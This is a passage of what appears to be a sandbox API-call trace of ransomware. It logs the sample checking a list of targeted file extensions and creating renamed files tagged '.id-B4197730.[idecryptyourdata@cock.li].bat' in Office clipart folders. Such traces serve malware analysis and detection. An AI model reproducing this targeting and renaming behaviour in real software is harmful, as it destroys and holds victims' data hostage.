Office\\root\\CLIPART\\PUB60COR\\J0301052.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301052.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.185] CloseHandle (hObject=0x484) returned 1 [0166.186] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.186] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301418.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301418.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.186] CloseHandle (hObject=0x484) returned 1 [0166.187] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.187] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0301432.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0301432.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.187] CloseHandle (hObject=0x484) returned 1 [0166.188] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.189] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304371.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304371.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.189] CloseHandle (hObject=0x484) returned 1 [0166.190] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.190] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304405.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304405.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.190] CloseHandle (hObject=0x484) returned 1 [0166.192] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.192] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304853.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304853.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.192] CloseHandle (hObject=0x484) returned 1 [0166.193] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.193] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304861.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304861.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.193] CloseHandle (hObject=0x484) returned 1 [0166.195] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.195] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0304875.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0304875.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.195] CloseHandle (hObject=0x484) returned 1 [0166.197] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.197] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309480.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309480.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.197] CloseHandle (hObject=0x484) returned 1 [0166.199] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.199] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309567.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309567.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.199] CloseHandle (hObject=0x484) returned 1 [0166.200] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.200] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309585.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309585.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.201] CloseHandle (hObject=0x484) returned 1 [0166.201] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.202] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309598.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309598.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.202] CloseHandle (hObject=0x484) returned 1 [0166.203] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.203] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309664.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.204] CloseHandle (hObject=0x484) returned 1 [0167.297] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.297] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309705.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.316] CloseHandle (hObject=0x51c) returned 1 [0167.966] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.966] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0386120.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0386120.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.598] CloseHandle (hObject=0x438) returned 1 [0169.879] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.881] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01357_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.881] CloseHandle (hObject=0x378) returned 1 [0169.882] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.882] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01368_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01368_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.882] CloseHandle (hObject=0x378) returned 1 [0169.884] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.884] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01421_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01421_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.885] CloseHandle (hObject=0x378) returned 1 [0169.887] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.887] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01468_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01468_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.887] CloseHandle (hObject=0x378) returned 1 [0169.888] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.888] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01470_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01470_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.888] CloseHandle (hObject=0x378) returned 1 [0169.890] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.890] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01472_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01472_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.891] CloseHandle (hObject=0x378) returned 1 [0169.892] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.892] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01473_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01473_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.892] CloseHandle (hObject=0x378) returned 1 [0169.893] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.893] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01474_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01474_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.893] CloseHandle (hObject=0x378) returned 1 [0169.894] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.895] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01627_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01627_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.895] CloseHandle (hObject=0x378) returned 1 [0169.896] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.896] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01680_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.897] CloseHandle (hObject=0x378) returned 1 [0169.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.897] lstrlenW (lpString=".doc") returned 4 [0169.897] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0169.897] lstrlenW (lpString=".docx") returned 5 [0169.897] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0169.897] lstrlenW (lpString=".pdf") returned 4 [0169.898] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0169.898] lstrlenW (lpString=".xls") returned 4 [0169.898] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0169.898] lstrlenW (lpString=".xlsx") returned 5 [0169.898] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0169.898] lstrlenW (lpString=".ppt") returned 4 [0169.898] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0169.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.898] lstrlenW (lpString=".zip") returned 4 [0169.898] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0169.898] lstrlenW (lpString=".rar") returned 4 [0169.898] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0169.898] lstrlenW (lpString=".bz2") returned 4 [0169.898] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0169.898] lstrlenW (lpString=".7z") returned 3 [0169.898] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0169.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.898] lstrlenW (lpString=".dbf") returned 4 [0169.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0169.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.898] lstrlenW (lpString=".1cd") returned 4 [0169.898] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.899] lstrlenW (lpString=".jpg") returned 4 [0169.899] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.899] lstrlenW (lpString=".doc") returned 4 [0169.899] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0169.899] lstrlenW (lpString=".docx") returned 5 [0169.899] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0169.899] lstrlenW (lpString=".pdf") returned 4 [0169.899] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0169.899] lstrlenW (lpString=".xls") returned 4 [0169.899] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0169.899] lstrlenW (lpString=".xlsx") returned 5 [0169.899] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0169.899] lstrlenW (lpString=".ppt") returned 4 [0169.899] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0169.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.899] lstrlenW (lpString=".zip") returned 4 [0169.899] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0169.900] lstrlenW (lpString=".rar") returned 4 [0169.900] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0169.900] lstrlenW (lpString=".bz2") returned 4 [0169.900] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0169.900] lstrlenW (lpString=".7z") returned 3 [0169.900] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.900] lstrlenW (lpString=".dbf") returned 4 [0169.900] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.900] lstrlenW (lpString=".1cd") returned 4 [0169.900] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0169.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01680_.WMF") returned 68 [0169.900] lstrlenW (lpString=".jpg") returned 4 [0169.900] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0169.900] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0169.900] lstrlenW (lpString="NA01682_.WMF") returned 12 [0169.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0169.901] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=3208) returned 1 [0169.901] CloseHandle (hObject=0x378) returned 1 [0169.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf")) returned 0x220 [0169.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0169.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0169.902] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.902] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.903] CreateFileW 